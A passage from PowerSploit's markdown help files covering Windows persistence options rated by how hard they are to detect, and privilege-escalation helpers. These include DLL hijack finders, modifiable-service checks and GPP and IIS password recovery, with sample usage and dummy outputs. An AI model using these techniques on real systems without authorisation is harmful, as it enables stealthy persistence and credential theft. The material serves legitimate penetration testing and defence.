daily.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: PermanentWMIDaily, ScheduledTaskDaily\r\nAliases: \r\n\r\nRequired: True\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Hourly\r\nStarts the payload hourly.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: ScheduledTaskHourly\r\nAliases: \r\n\r\nRequired: True\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -At\r\nStarts the payload at the specified time.\r\nYou may specify times in the following formats: '12:31 AM', '2 AM', '23:00:00', or '4:06:26 PM'.\r\n\r\n```yaml\r\nType: DateTime\r\nParameter Sets: PermanentWMIDaily, ScheduledTaskDaily\r\nAliases: \r\n\r\nRequired: True\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -OnIdle\r\nStarts the payload after one minute of idling.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: ScheduledTaskOnIdle\r\nAliases: \r\n\r\nRequired: True\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -AtLogon\r\nStarts the payload upon any user logon.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: ScheduledTaskAtLogon, Registry\r\nAliases: \r\n\r\nRequired: True\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -AtStartup\r\nStarts the payload within 240 and 325 seconds of computer startup.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: PermanentWMIAtStartup\r\nAliases: \r\n\r\nRequired: True\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n[http://www.exploit-monday.com](http://www.exploit-monday.com)\r\n\r\n"
  },
  {
    "path": "docs/Persistence/New-UserPersistenceOption.md",
    "content": "# New-UserPersistenceOption\r\n\r\n## SYNOPSIS\r\nConfigure user-level persistence options for the Add-Persistence function.\r\n\r\nPowerSploit Function: New-UserPersistenceOption  \r\nAuthor: Matthew Graeber (@mattifestation)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: None  \r\nOptional Dependencies: None\r\n\r\n## SYNTAX\r\n\r\n### ScheduledTaskOnIdle\r\n```\r\nNew-UserPersistenceOption [-ScheduledTask] [-OnIdle]\r\n```\r\n\r\n### ScheduledTaskHourly\r\n```\r\nNew-UserPersistenceOption [-ScheduledTask] [-Hourly]\r\n```\r\n\r\n### ScheduledTaskDaily\r\n```\r\nNew-UserPersistenceOption [-ScheduledTask] [-Daily] -At <DateTime>\r\n```\r\n\r\n### Registry\r\n```\r\nNew-UserPersistenceOption [-Registry] [-AtLogon]\r\n```\r\n\r\n## DESCRIPTION\r\nNew-UserPersistenceOption allows for the configuration of elevated persistence options.\r\nThe output of this function is a required parameter of Add-Persistence.\r\nAvailable persitence options in order of stealth are the following: scheduled task, registry.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\n$UserOptions = New-UserPersistenceOption -Registry -AtLogon\r\n```\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\n$UserOptions = New-UserPersistenceOption -ScheduledTask -OnIdle\r\n```\r\n\r\n## PARAMETERS\r\n\r\n### -ScheduledTask\r\nPersist via a scheduled task.\r\n\r\nDetection Difficulty:        Moderate\r\nRemoval Difficulty:          Moderate\r\nUser Detectable? \r\nNo\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: ScheduledTaskOnIdle, ScheduledTaskHourly, ScheduledTaskDaily\r\nAliases: \r\n\r\nRequired: True\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Registry\r\nPersist via the HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run registry key.\r\nNote: This option will briefly pop up a PowerShell console to the user.\r\n\r\nDetection Difficulty:        Easy\r\nRemoval Difficulty:          Easy\r\nUser Detectable? \r\nYes\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: Registry\r\nAliases: \r\n\r\nRequired: True\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Daily\r\nStarts the payload daily.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: ScheduledTaskDaily\r\nAliases: \r\n\r\nRequired: True\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Hourly\r\nStarts the payload hourly.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: ScheduledTaskHourly\r\nAliases: \r\n\r\nRequired: True\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -At\r\nStarts the payload at the specified time.\r\nYou may specify times in the following formats: '12:31 AM', '2 AM', '23:00:00', or '4:06:26 PM'.\r\n\r\n```yaml\r\nType: DateTime\r\nParameter Sets: ScheduledTaskDaily\r\nAliases: \r\n\r\nRequired: True\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -OnIdle\r\nStarts the payload after one minute of idling.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: ScheduledTaskOnIdle\r\nAliases: \r\n\r\nRequired: True\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -AtLogon\r\nStarts the payload upon any user logon.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: Registry\r\nAliases: \r\n\r\nRequired: True\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n[http://www.exploit-monday.com](http://www.exploit-monday.com)\r\n\r\n"
  },
  {
    "path": "docs/Privesc/Add-ServiceDacl.md",
    "content": "# Add-ServiceDacl\r\n\r\n## SYNOPSIS\r\nAdds a Dacl field to a service object returned by Get-Service.\r\n\r\nAuthor: Matthew Graeber (@mattifestation)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: PSReflect\r\n\r\n## SYNTAX\r\n\r\n```\r\nAdd-ServiceDacl [-Name] <String[]>\r\n```\r\n\r\n## DESCRIPTION\r\nTakes one or more ServiceProcess.ServiceController objects on the pipeline and adds a\r\nDacl field to each object.\r\nIt does this by opening a handle with ReadControl for the\r\nservice with using the GetServiceHandle Win32 API call and then uses\r\nQueryServiceObjectSecurity to retrieve a copy of the security descriptor for the service.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nGet-Service | Add-ServiceDacl\r\n```\r\n\r\nAdd Dacls for every service the current user can read.\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nGet-Service -Name VMTools | Add-ServiceDacl\r\n```\r\n\r\nAdd the Dacl to the VMTools service object.\r\n\r\n## PARAMETERS\r\n\r\n### -Name\r\nAn array of one or more service names to add a service Dacl for.\r\nPassable on the pipeline.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: ServiceName\r\n\r\nRequired: True\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### ServiceProcess.ServiceController\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n[https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/](https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/)\r\n\r\n"
  },
  {
    "path": "docs/Privesc/Enable-Privilege.md",
    "content": "# Enable-Privilege\r\n\r\n## SYNOPSIS\r\nEnables a specific privilege for the current process.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: PSReflect\r\n\r\n## SYNTAX\r\n\r\n```\r\nEnable-Privilege [-Privilege] <String[]>\r\n```\r\n\r\n## DESCRIPTION\r\nUses RtlAdjustPrivilege to enable a specific privilege for the current process.\r\nPrivileges can be passed by string, or the output from Get-ProcessTokenPrivilege\r\ncan be passed on the pipeline.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nGet-ProcessTokenPrivilege\r\n```\r\n\r\nPrivilege                    Attributes                     ProcessId\r\n                    ---------                    ----------                     ---------\r\n          SeShutdownPrivilege                      DISABLED                          3620\r\n      SeChangeNotifyPrivilege ...AULT, SE_PRIVILEGE_ENABLED                          3620\r\n            SeUndockPrivilege                      DISABLED                          3620\r\nSeIncreaseWorkingSetPrivilege                      DISABLED                          3620\r\n          SeTimeZonePrivilege                      DISABLED                          3620\r\n\r\nEnable-Privilege SeShutdownPrivilege\r\n\r\nGet-ProcessTokenPrivilege\r\n\r\n                    Privilege                    Attributes                     ProcessId\r\n                    ---------                    ----------                     ---------\r\n          SeShutdownPrivilege          SE_PRIVILEGE_ENABLED                          3620\r\n      SeChangeNotifyPrivilege ...AULT, SE_PRIVILEGE_ENABLED                          3620\r\n            SeUndockPrivilege                      DISABLED                          3620\r\nSeIncreaseWorkingSetPrivilege                      DISABLED                          3620\r\n          SeTimeZonePrivilege                      DISABLED                          3620\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nGet-ProcessTokenPrivilege\r\n```\r\n\r\nPrivilege                                        Attributes                     ProcessId\r\n---------                                        ----------                     ---------\r\nSeShutdownPrivilege                                DISABLED                          2828\r\nSeChangeNotifyPrivilege       ...AULT, SE_PRIVILEGE_ENABLED                          2828\r\nSeUndockPrivilege                                  DISABLED                          2828\r\nSeIncreaseWorkingSetPrivilege                      DISABLED                          2828\r\nSeTimeZonePrivilege                                DISABLED                          2828\r\n\r\n\r\nGet-ProcessTokenPrivilege | Enable-Privilege -Verbose\r\nVERBOSE: Attempting to enable SeShutdownPrivilege\r\nVERBOSE: Attempting to enable SeChangeNotifyPrivilege\r\nVERBOSE: Attempting to enable SeUndockPrivilege\r\nVERBOSE: Attempting to enable SeIncreaseWorkingSetPrivilege\r\nVERBOSE: Attempting to enable SeTimeZonePrivilege\r\n\r\nGet-ProcessTokenPrivilege\r\n\r\nPrivilege                                        Attributes                     ProcessId\r\n---------                                        ----------                     ---------\r\nSeShutdownPrivilege                    SE_PRIVILEGE_ENABLED                          2828\r\nSeChangeNotifyPrivilege       ...AULT, SE_PRIVILEGE_ENABLED                          2828\r\nSeUndockPrivilege                      SE_PRIVILEGE_ENABLED                          2828\r\nSeIncreaseWorkingSetPrivilege          SE_PRIVILEGE_ENABLED                          2828\r\nSeTimeZonePrivilege                    SE_PRIVILEGE_ENABLED                          2828\r\n\r\n## PARAMETERS\r\n\r\n### -Privilege\r\n{{Fill Privilege Description}}\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: Privileges\r\n\r\nRequired: True\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n[http://forum.sysinternals.com/tip-easy-way-to-enable-privileges_topic15745.html](http://forum.sysinternals.com/tip-easy-way-to-enable-privileges_topic15745.html)\r\n\r\n"
  },
  {
    "path": "docs/Privesc/Find-PathDLLHijack.md",
    "content": "# Find-PathDLLHijack\r\n\r\n## SYNOPSIS\r\nFinds all directories in the system %PATH% that are modifiable by the current user.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: Get-ModifiablePath\r\n\r\n## SYNTAX\r\n\r\n```\r\nFind-PathDLLHijack\r\n```\r\n\r\n## DESCRIPTION\r\nEnumerates the paths stored in Env:Path (%PATH) and filters each through Get-ModifiablePath\r\nto return the folder paths the current user can write to.\r\nOn Windows 7, if wlbsctrl.dll is\r\nwritten to one of these paths, execution for the IKEEXT can be hijacked due to DLL search\r\norder loading.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nFind-PathDLLHijack\r\n```\r\n\r\nFinds all %PATH% .DLL hijacking opportunities.\r\n\r\n## PARAMETERS\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### PowerUp.HijackableDLL.Path\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n[http://www.greyhathacker.net/?p=738](http://www.greyhathacker.net/?p=738)\r\n\r\n"
  },
  {
    "path": "docs/Privesc/Find-ProcessDLLHijack.md",
    "content": "# Find-ProcessDLLHijack\r\n\r\n## SYNOPSIS\r\nFinds all DLL hijack locations for currently running processes.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: None\r\n\r\n## SYNTAX\r\n\r\n```\r\nFind-ProcessDLLHijack [[-Name] <String[]>] [-ExcludeWindows] [-ExcludeProgramFiles] [-ExcludeOwned]\r\n```\r\n\r\n## DESCRIPTION\r\nEnumerates all currently running processes with Get-Process (or accepts an\r\ninput process object from Get-Process) and enumerates the loaded modules for each.\r\nAll loaded module name exists outside of the process binary base path, as those\r\nare DLL load-order hijack candidates.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nFind-ProcessDLLHijack\r\n```\r\n\r\nFinds possible hijackable DLL locations for all processes.\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nGet-Process VulnProcess | Find-ProcessDLLHijack\r\n```\r\n\r\nFinds possible hijackable DLL locations for the 'VulnProcess' processes.\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\nFind-ProcessDLLHijack -ExcludeWindows -ExcludeProgramFiles\r\n```\r\n\r\nFinds possible hijackable DLL locations not in C:\\Windows\\* and\r\nnot in C:\\Program Files\\* or C:\\Program Files (x86)\\*\r\n\r\n### -------------------------- EXAMPLE 4 --------------------------\r\n```\r\nFind-ProcessDLLHijack -ExcludeOwned\r\n```\r\n\r\nFinds possible hijackable DLL location for processes not owned by the\r\ncurrent user.\r\n\r\n## PARAMETERS\r\n\r\n### -Name\r\nThe name of a process to enumerate for possible DLL path hijack opportunities.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: ProcessName\r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: $(Get-Process | Select-Object -Expand Name)\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ExcludeWindows\r\nExclude paths from C:\\Windows\\* instead of just C:\\Windows\\System32\\*\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ExcludeProgramFiles\r\nExclude paths from C:\\Program Files\\* and C:\\Program Files (x86)\\*\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ExcludeOwned\r\nExclude processes the current user owns.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### PowerUp.HijackableDLL.Process\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n[https://www.mandiant.com/blog/malware-persistence-windows-registry/](https://www.mandiant.com/blog/malware-persistence-windows-registry/)\r\n\r\n"
  },
  {
    "path": "docs/Privesc/Get-ApplicationHost.md",
    "content": "# Get-ApplicationHost\r\n\r\n## SYNOPSIS\r\nRecovers encrypted application pool and virtual directory passwords from the applicationHost.config on the system.\r\n\r\nAuthor: Scott Sutherland  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: None\r\n\r\n## SYNTAX\r\n\r\n```\r\nGet-ApplicationHost\r\n```\r\n\r\n## DESCRIPTION\r\nThis script will decrypt and recover application pool and virtual directory passwords\r\nfrom the applicationHost.config file on the system. \r\nThe output supports the\r\npipeline which can be used to convert all of the results into a pretty table by piping\r\nto format-table.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nReturn application pool and virtual directory passwords from the applicationHost.config on the system.\r\n```\r\n\r\nGet-ApplicationHost\r\n\r\nuser    : PoolUser1\r\npass    : PoolParty1!\r\ntype    : Application Pool\r\nvdir    : NA\r\napppool : ApplicationPool1\r\nuser    : PoolUser2\r\npass    : PoolParty2!\r\ntype    : Application Pool\r\nvdir    : NA\r\napppool : ApplicationPool2\r\nuser    : VdirUser1\r\npass    : VdirPassword1!\r\ntype    : Virtual Directory\r\nvdir    : site1/vdir1/\r\napppool : NA\r\nuser    : VdirUser2\r\npass    : VdirPassword2!\r\ntype    : Virtual Directory\r\nvdir    : site2/\r\napppool : NA\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nReturn a list of cleartext and decrypted connect strings from web.config files.\r\n```\r\n\r\nGet-ApplicationHost | Format-Table -Autosize\r\n\r\nuser          pass               type              vdir         apppool\r\n----          ----               ----              ----         -------\r\nPoolUser1     PoolParty1! \r\nApplication Pool   NA           ApplicationPool1\r\nPoolUser2     PoolParty2! \r\nApplication Pool   NA           ApplicationPool2\r\nVdirUser1     VdirPassword1! \r\nVirtual Directory  site1/vdir1/ NA\r\nVdirUser2     VdirPassword2! \r\nVirtual Directory  site2/       NA\r\n\r\n## PARAMETERS\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### System.Data.DataTable\r\n\r\nSystem.Boolean\r\n\r\n## NOTES\r\nAuthor: Scott Sutherland - 2014, NetSPI\r\nVersion: Get-ApplicationHost v1.0\r\nComments: Should work on IIS 6 and Above\r\n\r\n## RELATED LINKS\r\n\r\n[https://github.com/darkoperator/Posh-SecMod/blob/master/PostExploitation/PostExploitation.psm1\r\nhttp://www.netspi.com\r\nhttp://www.iis.net/learn/get-started/getting-started-with-iis/getting-started-with-appcmdexe\r\nhttp://msdn.microsoft.com/en-us/library/k6h9cz8h(v=vs.80).aspx](https://github.com/darkoperator/Posh-SecMod/blob/master/PostExploitation/PostExploitation.psm1\r\nhttp://www.netspi.com\r\nhttp://www.iis.net/learn/get-started/getting-started-with-iis/getting-started-with-appcmdexe\r\nhttp://msdn.microsoft.com/en-us/library/k6h9cz8h(v=vs.80).aspx)\r\n\r\n"
  },
  {
    "path": "docs/Privesc/Get-CachedGPPPassword.md",
    "content": "# Get-CachedGPPPassword\r\n\r\n## SYNOPSIS\r\nRetrieves the plaintext password and other information for accounts pushed through Group Policy Preferences and\r\nleft in cached files on the host.\r\n\r\nAuthor: Chris Campbell (@obscuresec)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: None\r\n\r\n## SYNTAX\r\n\r\n```\r\nGet-CachedGPPPassword\r\n```\r\n\r\n## DESCRIPTION\r\nGet-CachedGPPPassword searches the local machine for cached for groups.xml, scheduledtasks.xml, services.xml and\r\ndatasources.xml files and returns plaintext passwords.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nGet-CachedGPPPassword\r\n```\r\n\r\nNewName   : \\[BLANK\\]\r\nChanged   : {2013-04-25 18:36:07}\r\nPasswords : {Super!!!Password}\r\nUserNames : {SuperSecretBackdoor}\r\nFile      : C:\\ProgramData\\Microsoft\\Group Policy\\History\\{32C4C89F-7\r\n            C3A-4227-A61D-8EF72B5B9E42}\\Machine\\Preferences\\Groups\\Gr\r\n            oups.xml\r\n\r\n## PARAMETERS\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n[http://www.obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html\r\nhttps://github.com/mattifestation/PowerSploit/blob/master/Recon/Get-GPPPassword.ps1\r\nhttps://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/gpp.rb\r\nhttp://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences\r\nhttp://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html](http://www.obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html\r\nhttps://github.com/mattifestation/PowerSploit/blob/master/Recon/Get-GPPPassword.ps1\r\nhttps://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/gpp.rb\r\nhttp://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences\r\nhttp://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html)\r\n\r\n"
  },
  {
    "path": "docs/Privesc/Get-ModifiablePath.md",
    "content": "# Get-ModifiablePath\r\n\r\n## SYNOPSIS\r\nParses a passed string containing multiple possible file/folder paths and returns\r\nthe file paths where the current user has modification rights.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: None\r\n\r\n## SYNTAX\r\n\r\n```\r\nGet-ModifiablePath [-Path] <String[]> [-Literal]\r\n```\r\n\r\n## DESCRIPTION\r\nTakes a complex path specification of an initial file/folder path with possible\r\nconfiguration files, 'tokenizes' the string in a number of possible ways, and\r\nenumerates the ACLs for each path that currently exists on the system.\r\nAny path that\r\nthe current user has modification rights on is returned in a custom object that contains\r\nthe modifiable path, associated permission set, and the IdentityReference with the specified\r\nrights.\r\nThe SID of the current user and any group he/she are a part of are used as the\r\ncomparison set against the parsed path DACLs.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\n'\"C:\\Temp\\blah.exe\" -f \"C:\\Temp\\config.ini\"' | Get-ModifiablePath\r\n```\r\n\r\nPath                       Permissions                IdentityReference\r\n----                       -----------                -----------------\r\nC:\\Temp\\blah.exe           {ReadAttributes, ReadCo...\r\nNT AUTHORITY\\Authentic...\r\nC:\\Temp\\config.ini         {ReadAttributes, ReadCo...\r\nNT AUTHORITY\\Authentic...\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nGet-ChildItem C:\\Vuln\\ -Recurse | Get-ModifiablePath\r\n```\r\n\r\nPath                       Permissions                IdentityReference\r\n----                       -----------                -----------------\r\nC:\\Vuln\\blah.bat           {ReadAttributes, ReadCo...\r\nNT AUTHORITY\\Authentic...\r\nC:\\Vuln\\config.ini         {ReadAttributes, ReadCo...\r\nNT AUTHORITY\\Authentic...\r\n...\r\n\r\n## PARAMETERS\r\n\r\n### -Path\r\nThe string path to parse for modifiable files.\r\nRequired\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: FullName\r\n\r\nRequired: True\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Literal\r\nSwitch.\r\nTreat all paths as literal (i.e.\r\ndon't do 'tokenization').\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: LiteralPaths\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### PowerUp.TokenPrivilege.ModifiablePath\r\n\r\nCustom PSObject containing the Permissions, ModifiablePath, IdentityReference for\r\na modifiable path.\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Privesc/Get-ModifiableRegistryAutoRun.md",
    "content": "# Get-ModifiableRegistryAutoRun\r\n\r\n## SYNOPSIS\r\nReturns any elevated system autoruns in which the current user can\r\nmodify part of the path string.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: Get-ModifiablePath\r\n\r\n## SYNTAX\r\n\r\n```\r\nGet-ModifiableRegistryAutoRun\r\n```\r\n\r\n## DESCRIPTION\r\nEnumerates a number of autorun specifications in HKLM and filters any\r\nautoruns through Get-ModifiablePath, returning any file/config locations\r\nin the found path strings that the current user can modify.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nGet-ModifiableRegistryAutoRun\r\n```\r\n\r\nReturn vulneable autorun binaries (or associated configs).\r\n\r\n## PARAMETERS\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### PowerUp.ModifiableRegistryAutoRun\r\n\r\nCustom PSObject containing results.\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Privesc/Get-ModifiableScheduledTaskFile.md",
    "content": "# Get-ModifiableScheduledTaskFile\r\n\r\n## SYNOPSIS\r\nReturns scheduled tasks where the current user can modify any file\r\nin the associated task action string.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: Get-ModifiablePath\r\n\r\n## SYNTAX\r\n\r\n```\r\nGet-ModifiableScheduledTaskFile\r\n```\r\n\r\n## DESCRIPTION\r\nEnumerates all scheduled tasks by recursively listing \"$($ENV:windir)\\System32\\Tasks\"\r\nand parses the XML specification for each task, extracting the command triggers.\r\nEach trigger string is filtered through Get-ModifiablePath, returning any file/config\r\nlocations in the found path strings that the current user can modify.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nGet-ModifiableScheduledTaskFile\r\n```\r\n\r\nReturn scheduled tasks with modifiable command strings.\r\n\r\n## PARAMETERS\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### PowerUp.ModifiableScheduledTaskFile\r\n\r\nCustom PSObject containing results.\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Privesc/Get-ModifiableService.md",
    "content": "# Get-ModifiableService\r\n\r\n## SYNOPSIS\r\nEnumerates all services and returns services for which the current user can modify the binPath.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: Test-ServiceDaclPermission, Get-ServiceDetail\r\n\r\n## SYNTAX\r\n\r\n```\r\nGet-ModifiableService\r\n```\r\n\r\n## DESCRIPTION\r\nEnumerates all services using Get-Service and uses Test-ServiceDaclPermission to test if\r\nthe current user has rights to change the service configuration.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nGet-ModifiableService\r\n```\r\n\r\nGet a set of potentially exploitable services.\r\n\r\n## PARAMETERS\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### PowerUp.ModifiablePath\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Privesc/Get-ModifiableServiceFile.md",
    "content": "# Get-ModifiableServiceFile\r\n\r\n## SYNOPSIS\r\nEnumerates all services and returns vulnerable service files.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: Test-ServiceDaclPermission, Get-ModifiablePath\r\n\r\n## SYNTAX\r\n\r\n```\r\nGet-ModifiableServiceFile\r\n```\r\n\r\n## DESCRIPTION\r\nEnumerates all services by querying the WMI win32_service class.\r\nFor each service,\r\nit takes the pathname (aka binPath) and passes it to Get-ModifiablePath to determine\r\nif the current user has rights to modify the service binary itself or any associated\r\narguments.\r\nIf the associated binary (or any configuration files) can be overwritten,\r\nprivileges may be able to be escalated.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nGet-ModifiableServiceFile\r\n```\r\n\r\nGet a set of potentially exploitable service binares/config files.\r\n\r\n## PARAMETERS\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### PowerUp.ModifiablePath\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Privesc/Get-ProcessTokenGroup.md",
